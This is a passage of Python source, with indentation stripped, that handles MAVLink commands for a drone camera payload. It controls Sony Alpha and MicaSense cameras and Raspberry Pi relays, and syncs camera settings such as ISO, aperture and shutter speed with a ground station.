# type=['COMMAND_LONG,RC_CHANNELS']
#
#msg = the_connection.recv_match(blocking=True, timeout=5)
msg = the_connection.recv_match(blocking=True, timeout=1)
if ( the_connection.target_system == msg.get_srcSystem() ): # check this and eliminate spurious messages if needed
print(f"data read {msg.get_type()}")
print(f"connection {the_connection.target_system} == {msg.get_srcSystem()}")
last_timestamp = msg._timestamp
#
# These are test messages to check the receive end !!!!
#
#self.mavlink_send_camera_feedback( the_connection )
#self.mavlink_send_camera_information(the_connection)
#self.mavlink_send_storage_information(the_connection)
#self.mavlink_send_camera_capture_status(the_connection)
#print(f" video stream returned {self.mavlink_send_video_stream_information(the_connection)}")
#self.mavlink_send_camera_image_captured(the_connection)
#the_connection.mav.camera_feedback_send( 1000, 1, 1, 22, 21, 10, 30, 21, 2, 3, 5, 2, 3)
#the_connection.mav.gps_raw_int_send( 1000, self.g_count, 77, 66, 76, 3, 1, 2, 3, 5)
#the_connection.mav.vibration_send( 1000, 1, 1, 22, 21, 10, 30 )
self.mavlink_send_param_value(the_connection)
#print("FTP request for XML file .... I'm sending it as my payload")
#try:
# f = open(self.CAM_XML_FILE,'r')
# #payload = f.read() not raw read but as bytes below
# lab = np.fromfile(f, dtype=np.uint8)
# f.close()
#except Exception as e:
# print(f" XML file read exception {e}")
#self.mavlink_do_ftp_send( the_connection, self.NETWORK_ID, lab)
self.g_count = self.g_count + 1
if not msg:
return
if msg.get_type() == "BAD_DATA":
self.ACK_ERROR = self.GOT_BAD
self.errRCV_COMMAND = 0
self.errRPM2 = 0
if mavutil.all_printable(msg.data):
sys.stdout.write(msg.data)
sys.stdout.flush()
elif msg.get_type() == 'PARAM_REQUEST_LIST':
# this i will now try from the class objects
#
self.mavlink_send_param_value(the_connection)
#
sharedObj.mav_req_all_param = sharedObj.MAV_REQ_ALL_PARAM
print("\033[35m PARAM_REQUEST_LIST was sent - shared object set to %d" % (sharedObj.mav_req_all_param))
# trap was found taken it out..... exit(97)
exit(99)
elif msg.get_type() == 'PARAM_SET':
# this i will now try from the class objects
#
self.mavlink_send_param_value(the_connection)
#
# sharedObj.mav_req_all_param = sharedObj.MAV_REQ_ALL_PARAM
#
# value is sent as a float but its an integer, so unpack the float read as an integer
#
# ref:- https://gist.github.com/AlexEshoo/d3edc53129ed010b0a5b693b88c7e0b5
#
m = struct.unpack('I', struct.pack('f', msg.param_value))[0]
x = self.mav_param_type_conv( msg.param_type, msg.param_value )
if ( self.writeParamSetFromMavLink( msg.param_id, sharedObj, m ) == True ):
#print("\033[33m PARAM_SET was sent for %s :: %d type %d"%( msg.param_id, msg.param_value, msg.param_type ))
print(f"\033[33m PARAM_SET was sent for {msg.param_id} val {msg.param_value} type {msg.param_type} really sent {m}" )
else:
print("\033[31m PARAM_SET write fail for %s :: %d type %d"%( msg.param_id, msg.param_value, msg.param_type ))
# ===== TRAP =====
exit(97)
elif msg.get_type() == 'PARAM_EXT_VALUE':
# this i will now try from the class objects
#
# self.mavlink_send_param_value(the_connection)
#
sharedObj.mav_req_all_param = sharedObj.MAV_REQ_ALL_PARAM
print("\033[35m PARAM_EXT_VALUE was sent for %s %d"%( msg.param_id, int(msg.param_value)))
# ===== TRAP =====
#exit(96)
elif msg.get_type() == 'PARAM_EXT_SET':
# this i will now try from the class objects
#
# self.mavlink_send_param_value(the_connection)
#
if ( self.writeParamSetFromMavLink( msg.param_id, sharedObj, self.mav_param_type_conv( msg.param_type, msg.param_value ) ) == True ):
print("\033[35m PARAM_SET was sent for %s :: %d"%( msg.param_id, self.mav_param_type_conv(msg.param_type, msg.param_value) ))
else:
print("\033[31m PARAM_SET write fail for %s :: %s"%( msg.param_id, msg.param_value))
# ===== TRAP =====
#exit(95)
elif msg.get_type() == 'RC_CHANNELS':
print("RC Channel message (system %u component %u)\n" % (the_connection.target_system, the_connection.target_component))
elif msg.get_type() == 'COMMAND_LONG':
print("!!!!!! Long message received (system %u component %u)\n" % (the_connection.target_system, the_connection.target_component))
print("in cmd long ... ACK RES %s %u \n" % (self.ACK_RESULT,mavutil.mavlink.MAV_CMD_REQUEST_CAMERA_INFORMATION))
print("Command %u p1 %u p2 %u p3 %u p4 %u \n" % (msg.command, msg.param1, msg.param2, msg.param3, msg.param4))
print("p5 %u p6 %u p7 %u \n" % (msg.param5, msg.param6, msg.param7))
# print(msg.get_payload())
# print(msg.get_msgbuf())
# print(msg.get_fieldnames())
# print(msg.get_type())
#
# print the message recieved in json
#
print(msg.to_dict())
if not (self.ACK_RESULT == mavutil.mavlink.MAV_RESULT_ACCEPTED):
self.RCV_COMMAND = int(msg.command)
print(f"\033[35m IN LOOP :: self ACK RES {self.ACK_RESULT} RCV {self.RCV_COMMAND} == {mavutil.mavlink.MAV_CMD_REQUEST_MESSAGE}")
if (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_REQUEST_MESSAGE):
self.RPM2 = int(msg.param1)
print(f"Is it here {self.RPM2} == {self.CAMERA_INFORMATION}")
if (self.RPM2 == self.CAMERA_INFORMATION): #camera_information
self.type_of_msg = 6500
print("\033[34m >>>>>> camera information \033[36m >>>>>>>>>>>>>>>>>>>>>>")
self.mavlink_send_camera_information(the_connection)
elif (self.RPM2 == self.CAMERA_SETTINGS): #camera_settings
self.type_of_msg = 6501
elif (self.RPM2 == self.STORAGE_INFORMATION): #storage information
self.type_of_msg = 6502
elif (self.RPM2 == self.CAMERA_CAPTURE_STATUS): #camera capture status
self.type_of_msg = 6503
elif (self.RPM2 == mavutil.mavlink.MAVLINK_MSG_ID_CAMERA_IMAGE_CAPTURED): #retrieve lost images
self.type_of_msg = 6504
self.Got_Param1 = int(msg.param2)
elif (self.RPM2 == 269): #video stream
self.type_of_msg = 6505
else:
self.type_of_msg = 0
print(f"camera info received {self.RPM2}")
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_REQUEST_CAMERA_INFORMATION):
print("request camera Info OLD MESSAGE.....")
#
# Send camera information
#
self.mavlink_send_camera_information(the_connection)
if (msg.param1 == 1):
self.type_of_msg = mavutil.mavlink.MAV_CMD_REQUEST_CAMERA_INFORMATION
print("=========== !! send to QGround Camera Information !! ==========")
self.mavlink_send_camera_information(the_connection)
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_REQUEST_VIDEO_STREAM_INFORMATION):
print("request video stream Info OLD MESSAGE.....")
self.type_of_msg = mavutil.mavlink.MAV_CMD_REQUEST_VIDEO_STREAM_INFORMATION
print("=========== !! send to QGround VideoStream !! ==========")
self.mavlink_send_video_stream_information(the_connection)
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_DO_SET_RELAY):
self.type_of_msg = mavutil.mavlink.MAV_CMD_DO_SET_RELAY
print(f"\033 [31m >>>>> Got a message to set the RelayNo {msg.param1} to state {msg.param2}")
self.raspberry_pi3_set_relay(self, msg.param1, msg.param2)
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_VIDEO_START_CAPTURE):
self.type_of_msg = mavutil.mavlink.MAV_CMD_VIDEO_START_CAPTURE
self.Got_Param1 = msg.param1
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_VIDEO_STOP_CAPTURE):
self.type_of_msg = mavutil.mavlink.MAV_CMD_VIDEO_START_CAPTURE
self.Got_Param1 = msg.param1
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_IMAGE_START_CAPTURE):
self.type_of_msg = mavutil.mavlink.MAV_CMD_IMAGE_START_CAPTURE
self.Got_Param1 = msg.param2
self.Got_Param2 = msg.param3
self.Got_Param3 = msg.param4
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_IMAGE_STOP_CAPTURE):
self.type_of_msg = mavutil.mavlink.MAV_CMD_IMAGE_STOP_CAPTURE
self.Got_Param1 = msg.param3
self.Got_Param2 = msg.param4
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_VIDEO_START_STREAMING):
self.type_of_msg = mavutil.mavlink.MAV_CMD_VIDEO_START_STREAMING
self.Got_Param1 = msg.param1
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_VIDEO_STOP_STREAMING):
self.type_of_msg = MAV_CMD_VIDEO_STOP_STREAMING
self.Got_Param1 = msg.param1
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_SET_CAMERA_MODE):
self.type_of_msg = mavutil.mavlink.MAV_CMD_SET_CAMERA_MODE
self.Got_Param1 = msg.param2
elif (self.RCV_COMMAND == mavdefs.MAV_CMD_SET_CAMERA_ZOOM):
self.type_of_msg = mavdefs.MAV_CMD_SET_CAMERA_ZOOM
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
self.Got_Param3 = msg.param3
elif (self.RCV_COMMAND == mavdefs.MAV_CMD_SET_CAMERA_FOCUS):
self.type_of_msg = mavdefs.MAV_CMD_SET_CAMERA_FOCUS
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_DO_DIGICAM_CONFIGURE):
self.type_of_msg = mavutil.mavlink.MAV_CMD_DO_DIGICAM_CONFIGURE
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
self.Got_Param3 = msg.param3
self.Got_Param4 = msg.param4
self.Got_Param5 = msg.param5
self.Got_Param6 = msg.param6
self.Got_Param7 = msg.param7
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_DO_DIGICAM_CONTROL):
#
# Taking a picture is hard coded to here as it needs no delay
#
self.type_of_msg = mavutil.mavlink.MAV_CMD_DO_DIGICAM_CONTROL
print(f"\033[33m DO DIGICAM CONTROL {msg.param1} {msg.param1}")
if ((int(msg.param5) == 1) and (int(msg.param7) == 1)):
try:
if (redCam.redEdgeCaptureFivePicturesNoUpload() == 1):
print("Took the micasense pictures on SD Card")
else:
print("Error taking pictures with the micasense camera")
except Exception as e:
print(f" Tried to take picture ERROR:: {e}")
elif ((int(msg.param5) == 1) and (int(msg.param7) == 0)):
try:
if (redCam.redEdgeCaptureFivePictures() == 1):
print("saved the pictures to the raspberry Pi")
else:
print("error saving the pictures to the raspberry Pi")
except Exception as e:
print(f" Tried to take picture ERROR:: {e}")
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
self.Got_Param3 = msg.param3
self.Got_Param4 = msg.param4
self.Got_Param5 = msg.param5
self.Got_Param6 = msg.param6
self.Got_Param7 = msg.param7
print("\033[36m DO DIGICAM CONTROL COMPLETED")
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_DO_CONTROL_VIDEO):
self.type_of_msg = mavutil.mavlink.MAV_CMD_DO_CONTROL_VIDEO
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
self.Got_Param3 = msg.param3
self.Got_Param4 = msg.param4
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_DO_SET_CAM_TRIGG_INTERVAL):
self.type_of_msg = mavutil.mavlink.MAV_CMD_DO_SET_CAM_TRIGG_INTERVAL
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_RESET_CAMERA_SETTINGS):
self.type_of_msg = mavutil.mavlink.MAV_CMD_RESET_CAMERA_SETTINGS
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_DO_MOUNT_CONTROL_QUAT):
self.type_of_msg = mavutil.mavlink.MAV_CMD_DO_MOUNT_CONTROL_QUAT
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
self.Got_Param3 = msg.param3
self.Got_Param4 = msg.param4
#elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_DO_GIMBAL_MANAGER_PITCHYAW):
# self.type_of_msg = mavutil.mavlink.MAV_CMD_DO_GIMBAL_MANAGER_PITCHYAW
# self.Got_Param1 = msg.param1
# self.Got_Param2 = msg.param2
# self.Got_Param3 = msg.param3
# self.Got_Param4 = msg.param4
# self.Got_Param5 = msg.param5
# self.Got_Param6 = msg.param6
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_DO_TRIGGER_CONTROL):
self.type_of_msg = mavutil.mavlink.MAV_CMD_DO_TRIGGER_CONTROL
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
self.Got_Param3 = msg.param3
elif (self.RCV_COMMAND == 2004): # MAV_CMD_CAMERA_TRACK_POINT=2004
self.type_of_msg = 2004;
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
self.Got_Param3 = msg.param3
elif (self.RCV_COMMAND == 2005): # MAV_CMD_CAMERA_TRACK_RECTANGLE=2005
self.type_of_msg = 2005;
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
self.Got_Param3 = msg.param3
elif (self.RCV_COMMAND == 2010): # MAV_CMD_CAMERA_STOP_TRACKING=2010
self.type_of_msg = 2010;
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_STORAGE_FORMAT):
self.type_of_msg = mavutil.mavlink.MAV_CMD_STORAGE_FORMAT
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_DO_SET_SERVO):
self.type_of_msg = mavutil.mavlink.MAV_CMD_DO_SET_SERVO
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
print("\033[32m saw the relay command come in")
else:
print(f"got this id {self.RCV_COMMAND} {msg.command}")
self.RPM2 = 0
self.type_of_msg = self.RCV_COMMAND
self.ACK_RESULT = mavutil.mavlink.MAV_RESULT_ACCEPTED
print("\033[36m >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ACK RES %d %d"%(self.ACK_RESULT,mavutil.mavlink.MAV_RESULT_ACCEPTED))
print("\033[31m")
else:
self.ACK_ERROR = self.GOT_ERROR
self.errRCV_COMMAND = msg.command
self.errRPM2 = msg.param1
print(f"Error ACK message send for multiple request @ cmd :: {self.errRCV_COMMAND} rpm :: {self.errRPM2}")
elif msg.get_type() == 'CAMERA_IMAGE_CAPTURED':
print("Cam Cap message received (system %u component %u)\n" % (the_connection.target_system, the_connection.target_component))
print("lat %u lon %u alt %u\n" % (msg.lat, msg.lon, msg.alt))
print("URL %u)\n" % (msg.file_url))
elif msg.get_type() == 'GPS_RAW_INT':
the_connection.mav.gps_raw_int_send( 1000, 1, 22, 21, 1, 3, 1, 2, 3, 5)
elif msg.get_type() == 'CAMERA_FEEDBACK':
print("Camera Feedback request was made")
#the_connection.mav.camera_feedback_send( 1000, 1, 1, 22, 21, 10, 30, 21, 2, 3, 5, 2, 3)
elif msg.get_type() == 'FILE_TRANSFER_PROTOCOL':
print("FTP request for XML file .... I'm sending it as my payloads in chunks of 251 bytes")
lab = []
try:
f = open(self.CAM_XML_FILE,'r')
#payload = f.read() not raw read but as bytes below
lab = np.fromfile(f, dtype=np.uint8)
f.close()
except Exception as e:
print(f" XML file read exception {e}")
self.mavlink_do_ftp_send( the_connection, self.NETWORK_ID, lab)
elif msg.get_type() == 'REQUEST_DATA_STREAM':
print("REQUEST DATA STREAM :: start %u id %u req_rte %u\n" % (msg.start_stop, msg.req_stream_id, msg.req_message_rate))
elif msg.get_type() == 'STATUSTEXT':
print("STATUSTEXT :: text %s " % (msg.text))
elif msg.get_type() == 'HEARTBEAT':
print("HEARTBEAT :: src %s type %s auto %s sys %s" % (msg.get_srcSystem(), msg.type,msg.autopilot,msg.system_status))
else:
print(f"unsupported command :: {msg.get_type()}")
#time.sleep(0.05)
loop = loop - 1
def mavlink_send_ack_command(self, the_connection, cmd, rpm2, pro, res):
if (self.mavlink20(the_connection) == True):
print(f"\033[31m sending an ACK {pro}")
try:
the_connection.mav.command_ack_send(
int(cmd), # command
int(res), # result
int(pro), # progress
int(rpm2), # result_param2
the_connection.target_system, # target_system
the_connection.target_component) # target_component
print(f"ACK sent {rpm2} {res}")
ret = True
except Exception as err_msg:
print("Failed 1st ACK message : %s" % (err_msg))
try:
the_connection.mav.command_ack_send(
int(cmd), # command
int(res)) # result
print(f"ACK sent {rpm2} {res}")
ret = True
except Exception as err_msg:
print("Failed 2nd ACK message : %s" % (err_msg))
ret = False
return ret
elif (self.mavlink10(the_connection) == True):
print(f"\033[31m sending an ACK {pro}")
try:
the_connection.mav.command_ack_send(
int(cmd), # command
int(res)) # result
print(f"ACK sent {rpm2} {res}")
ret = True
except Exception as err_msg:
print("Failed 1st ACK message : %s" % (err_msg))
try:
the_connection.mav.command_ack_send(
int(cmd), # command
int(res), # result
int(pro), # progress
int(rpm2), # result_param2
the_connection.target_system, # target_system
the_connection.target_component) # target_component
print(f"ACK sent {rpm2} {res}")
ret = True
except Exception as err_msg:
print("Failed 2nd ACK message : %s" % (err_msg))
ret = False
return ret
def writeParamSetFromMavLink( self, msgString, mavObj, dataRcv ):
# must be EXACT tag match
patternISO = re.compile(r"\bsonyISO\b")
patternAper = re.compile(r"\bsonyAperture\b")
patternExPro = re.compile(r"\bsonyExProMode\b")
patternFocus = re.compile(r"\bsonyFocusMode\b")
patternFocA = re.compile(r"\bsonyFocusArea\b")
patternShSp = re.compile(r"\bsonyShutSpd\b")
patternWhiBal = re.compile(r"sonyWhiteBalance")
patternStCa = re.compile(r"\bsonyStillCapMode\b")
if not (msgString.find("sonyISO") == -1):
#if (re.search(patternISO, msgString.lower())==True):
return (mavObj.setMavIsoModeData( dataRcv ))
elif not (msgString.find("sonyAperture") == -1):
#elif (re.search(patternAper, msgString.lower())==True):
return (mavObj.setMavApertureData( dataRcv ))
elif not (msgString.find("sonyExProMode") == -1):
#elif (re.search(patternExPro, msgString.lower())==True):
return (mavObj.setMavExProData( dataRcv ))
elif not (msgString.find("sonyFocusArea") == -1):
#elif (re.search(patternFocA, msgString.lower())==True):
return (mavObj.setMavFocusAreaData( dataRcv ))
elif not (msgString.find("sonyFocusMode") == -1):
#elif (re.search(patternFocus, msgString.lower())==True):
return (mavObj.setMavFocusData( dataRcv ))
elif not (msgString.find("sonyShutSpd") == -1):
#elif (re.search(patternShSp, msgString.lower())==True):
return (mavObj.setMavShutterData( dataRcv ))
elif not (msgString.find("sonyWhiteBalance") == -1):
#elif (re.search(patternWhiBal, msgString.lower())==True):
return (mavObj.setMavWhiteBalData( dataRcv ))
elif not (msgString.find("sonyStillCapMode") == -1):
#elif (re.search(patternStCa, msgString.lower())==True):
return (mavObj.setMavStillCapModeData( dataRcv ))
else:
print("unsupported variable name %s to val=%d :: NOT SET "%(msgString,dataRcv))
return False
#
# ============================================================= multi-process threads =====================================================================
#
def manageAlphaCameraExpro( mySonyCam, mav2SonyVals, expro, tm_upd_disable=False, time_delta = 1000 ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
#
# initialise general program control flags
#
success = False
timenow = 0
#
# check to see if mavlink wrote something if so write to cam
# and update the update flag to get the mavlink send
#
success = mySonyCam.setSonyCamExProData( expro, mav2SonyVals )
#
# Time enabled reading to poll on time_delta
# when this data is written the mavlink task
# should send it to the GCS via mavlink messages
#
if not (tm_upd_disable == True):
timenow = mySonyCam.my_timestamp()
#
if ((timenow - expro.timestamp) > time_delta):
if (mySonyCam.getSonyCamExProData( expro )==True):
expro.timestamp = timenow
#print(f"\033[36m Time Delta occurred {timenow} {expro.timestamp}")
#else:
#print(f"\033[34m No time diff {timenow} {expro.timestamp}")
print ('Exiting :', multiprocessing.current_process().name)
def sendMavExpro( mySonyCam, expro, ConnID ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
success = mySonyCam.sendMavlinkMessageForObject( expro, ConnID )
print ('Exiting :', multiprocessing.current_process().name)
def manageAlphaCameraAperture( mySonyCam, mav2SonyVals, aper, tm_upd_disable=False, time_delta = 1000 ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
#
# initialise general program control flags
#
success = False
timenow = 0
#
# check to see if mavlink wrote something if so write to cam
# and update the update flag to get the mavlink send
#
success = mySonyCam.setSonyCamApertureData( aper, mav2SonyVals )
#
# Time enabled reading to poll on time_delta
# when this data is written the mavlink task
# should send it to the GCS via mavlink messages
#
if not (tm_upd_disable == True):
timenow = mySonyCam.my_timestamp()
#
if ((timenow - aper.timestamp) > time_delta):
if (mySonyCam.getSonyApertureData( aper )==True):
aper.timestamp = timenow
print ('Exiting :', multiprocessing.current_process().name)
def sendMavAper( mySonyCam, aper, ConnID ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
success = mySonyCam.sendMavlinkMessageForObject( aper, ConnID )
print ('Exiting :', multiprocessing.current_process().name)
def manageAlphaCameraFocusData( mySonyCam, mav2SonyVals, focusdata, focusarea, tm_upd_disable=False, time_delta = 1000 ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
#
# initialise general program control flags
#
success = False
timenow = 0
#
# check to see if mavlink wrote something if so write to cam
# and update the update flag to get the mavlink send
#
success = mySonyCam.setSonyCamFocusData( focusdata, mav2SonyVals )
success = mySonyCam.setSonyCamFocusAreaData( focusarea, mav2SonyVals )
#
# Time enabled reading to poll on time_delta
# when this data is written the mavlink task
# should send it to the GCS via mavlink messages
#
if not (tm_upd_disable == True):
timenow = mySonyCam.my_timestamp()
#
if ((timenow - focusdata.timestamp) > time_delta):
if (mySonyCam.getSonyCamFocusData( focusdata )==True):
focusdata.timestamp = timenow
if ((timenow - focusarea.timestamp) > time_delta):
if (mySonyCam.getSonyCamFocusAreaData( focusarea )==True):
focusarea.timestamp = timenow
print ('Exiting :', multiprocessing.current_process().name)
def sendMavFocusData( mySonyCam, focusdata, focusarea, ConnID ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
#
# check to see if mavlink wrote something if so write to cam
# and update the update flag to get the mavlink send
#
success = mySonyCam.sendMavlinkMessageForObject( focusdata, ConnID )
success = mySonyCam.sendMavlinkMessageForObject( focusarea, ConnID )
print ('Exiting :', multiprocessing.current_process().name)
def manageAlphaCameraIso( mySonyCam, mav2SonyVals, iso, tm_upd_disable=False, time_delta = 1000 ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
#
# initialise general program control flags
#
success = False
timenow = 0
#
# check to see if mavlink wrote something if so write to cam
# and update the update flag to get the mavlink send
#
success = mySonyCam.setSonyCamISOData( iso, mav2SonyVals )
#
# Time enabled reading to poll on time_delta
# when this data is written the mavlink task
# should send it to the GCS via mavlink messages
#
if not (tm_upd_disable == True):
timenow = mySonyCam.my_timestamp()
#
if ((timenow - iso.timestamp) > time_delta):
if (mySonyCam.getSonyCamISOData( iso )==True):
iso.timestamp = timenow
print ('Exiting :', multiprocessing.current_process().name)
def sendMavIso( mySonyCam, iso, ConnID ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
#
# check to see if mavlink wrote something if so write to cam
# and update the update flag to get the mavlink send
#
success = mySonyCam.sendMavlinkMessageForObject( iso, ConnID )
print ('Exiting :', multiprocessing.current_process().name)
def manageAlphaCameraShutSpd( mySonyCam, mav2SonyVals, shut_sp, tm_upd_disable=False, time_delta = 1000 ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
#
# initialise general program control flags
#
success = False
timenow = 0
#
# check to see if mavlink wrote something if so write to cam
# and update the update flag to get the mavlink send
#
success = mySonyCam.setSonyCamShutSpdData( shut_sp, mav2SonyVals )
#
# Time enabled reading to poll on time_delta
# when this data is written the mavlink task
# should send it to the GCS via mavlink messages
#
if not (tm_upd_disable == True):
timenow = mySonyCam.my_timestamp()
#
if ((timenow - shut_sp.timestamp) > time_delta):
if (mySonyCam.getSonyCamShutSpdData( shut_sp )==True):
shut_sp.timestamp = timenow
print ('Exiting :', multiprocessing.current_process().name)
def sendMavShutSpd( mySonyCam, shut_sp, ConnID ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
#
# check to see if mavlink wrote something if so write to cam
# and update the update flag to get the mavlink send
#
success = mySonyCam.sendMavlinkMessageForObject( shut_sp, ConnID )
print ('Exiting :', multiprocessing.current_process().name)
def manageAlphaWhiteBala( mySonyCam, mav2SonyVals, whitebal, tm_upd_disable=False, time_delta = 1000 ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
#
# initialise general program control flags
#
success = False
timenow = 0
#
# check to see if mavlink wrote something if so write to cam
# and update the update flag to get the mavlink send
#
success = mySonyCam.setSonyCamWhiteBalaData( whitebal, mav2SonyVals )
#
# Time enabled reading to poll on time_delta
# when this data is written the mavlink task
# should send it to the GCS via mavlink messages
#
if not (tm_upd_disable == True):
timenow = mySonyCam.my_timestamp()
#
if ((timenow - whitebal.timestamp) > time_delta):
if (mySonyCam.getSonyCamWhiteBalaData( whitebal )==True):
whitebal.timestamp = timenow
print ('Exiting :', multiprocessing.current_process().name)
def sendMavWhiteBala( mySonyCam, whitebal, ConnID ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
success = mySonyCam.sendMavlinkMessageForObject( whitebal, ConnID )
print ('Exiting :', multiprocessing.current_process().name)
def manageAlphaCameraStillCap( mySonyCam, mav2SonyVals, stillcap, tm_upd_disable=False, time_delta = 1000 ):
#
# initialise general program control flags
#
success = False
timenow = 0
# use this if you want ot make a daemon proc
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
#
#
# check to see if mavlink wrote something if so write to cam
# and update the update flag to get the mavlink send
#
success = mySonyCam.setSonyCamStillCapModeData( stillcap, mav2SonyVals )
#
# Time enabled reading to poll on time_delta
# when this data is written the mavlink task
# should send it to the GCS via mavlink messages
#
if not (tm_upd_disable == True):
timenow = mySonyCam.my_timestamp()
#
if ((timenow - stillcap.timestamp) > time_delta):
if (mySonyCam.getSonyCamExProData( stillcap )==True):
stillcap.timestamp = timenow
print ('Exiting :', multiprocessing.current_process().name)
def sendMavStillCap( mySonyCam, stillcap, ConnID ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
success = mySonyCam.sendMavlinkMessageForObject( stillcap, ConnID )
print ('Exiting :', multiprocessing.current_process().name) #
def mavlinkReqGetParamStillCap( mySonyCam, mav2SonyVals, obj ):
if (mySonyCam.getSonyCamExProData( obj )==True):
obj.timestamp = mySonyCam.my_timestamp()
return True
else:
return False
def mavlinkReqGetParamWhiteBala( mySonyCam, mav2SonyVals, obj ):
if (mySonyCam.getSonyCamWhiteBalaData( obj )==True):
obj.timestamp = mySonyCam.my_timestamp()
return True
else:
return False
def mavlinkReqGetParamShutSpd( mySonyCam, mav2SonyVals, obj ):
if (mySonyCam.getSonyCamShutSpdData( obj )==True):
obj.timestamp = mySonyCam.my_timestamp()
return True
else:
return False
def mavlinkReqGetParamIso( mySonyCam, mav2SonyVals, obj ):
if (mySonyCam.getSonyCamISOData( obj )==True):
obj.timestamp = mySonyCam.my_timestamp()
return True
else:
return False
def mavlinkReqGetParamFocus( mySonyCam, mav2SonyVals, obj ):
if (mySonyCam.getSonyCamFocusData( obj )==True):
obj.timestamp = mySonyCam.my_timestamp()
return True
else:
return False
def mavlinkReqGetParamFocusArea( mySonyCam, mav2SonyVals, obj ):
if (mySonyCam.getSonyCamFocusAreaData( obj )==True):
obj.timestamp = mySonyCam.my_timestamp()
return True
else:
return False
def mavlinkReqGetParamAperture( mySonyCam, mav2SonyVals, obj ):
if (mySonyCam.getSonyApertureData( obj )==True):
obj.timestamp = mySonyCam.my_timestamp()
return True
else:
return False
def mavlinkReqGetParamExPro( mySonyCam, mav2SonyVals, obj ):
if (mySonyCam.getSonyCamExProData( obj )==True):
obj.timestamp = mySonyCam.my_timestamp()
return True
else:
return False
def serviceParamRequests( mySonyCam, mav2SonyVals, stcap, wb, ss, iso, pf, pfa, pa, expro ):
if not (mav2SonyVals.mav_req_all_param == 0):
if not ((int(mav2SonyVals.mav_req_all_param) & int(mav2SonyVals.ParamStillCap)) == 0):
if (mavlinkReqGetParamStillCap( mySonyCam, mav2SonyVals, stcap ) == True):
mav2SonyVals.mav_req_all_param = mav2SonyVals.mav_req_all_param & ~mav2SonyVals.ParamStillCap
# param_ack ?
if not ((int(mav2SonyVals.mav_req_all_param) & int(mav2SonyVals.ParamWhiteBala)) == 0):
if (mavlinkReqGetParamWhiteBala( mySonyCam, mav2SonyVals, wb ) == True):
mav2SonyVals.mav_req_all_param = mav2SonyVals.mav_req_all_param & ~mav2SonyVals.ParamWhiteBala
if not ((int(mav2SonyVals.mav_req_all_param) & int(mav2SonyVals.ParamShutSpd)) == 0):
if (mavlinkReqGetParamShutSpd( mySonyCam, mav2SonyVals, ss ) == True):
mav2SonyVals.mav_req_all_param = mav2SonyVals.mav_req_all_param & ~mav2SonyVals.ParamShutSpd
if not ((int(mav2SonyVals.mav_req_all_param) & int(mav2SonyVals.ParamIso)) == 0):
if (mavlinkReqGetParamIso( mySonyCam, mav2SonyVals, iso ) == True):
mav2SonyVals.mav_req_all_param = mav2SonyVals.mav_req_all_param & ~mav2SonyVals.ParamIso
if not ((int(mav2SonyVals.mav_req_all_param) & int(mav2SonyVals.ParamFocus)) == 0):
if (mavlinkReqGetParamFocus( mySonyCam, mav2SonyVals, pf ) == True):
mav2SonyVals.mav_req_all_param = mav2SonyVals.mav_req_all_param & ~mav2SonyVals.ParamFocus
if not ((int(mav2SonyVals.mav_req_all_param) & int(mav2SonyVals.ParamFocusArea)) == 0):
if (mavlinkReqGetParamFocusArea( mySonyCam, mav2SonyVals, pfa ) == True):
mav2SonyVals.mav_req_all_param = mav2SonyVals.mav_req_all_param & ~mav2SonyVals.ParamFocusArea
if not ((int(mav2SonyVals.mav_req_all_param) & int(mav2SonyVals.ParamAperture)) == 0):
if (mavlinkReqGetParamAperture( mySonyCam, mav2SonyVals, pa ) == True):
mav2SonyVals.mav_req_all_param = mav2SonyVals.mav_req_all_param & ~mav2SonyVals.ParamAperture
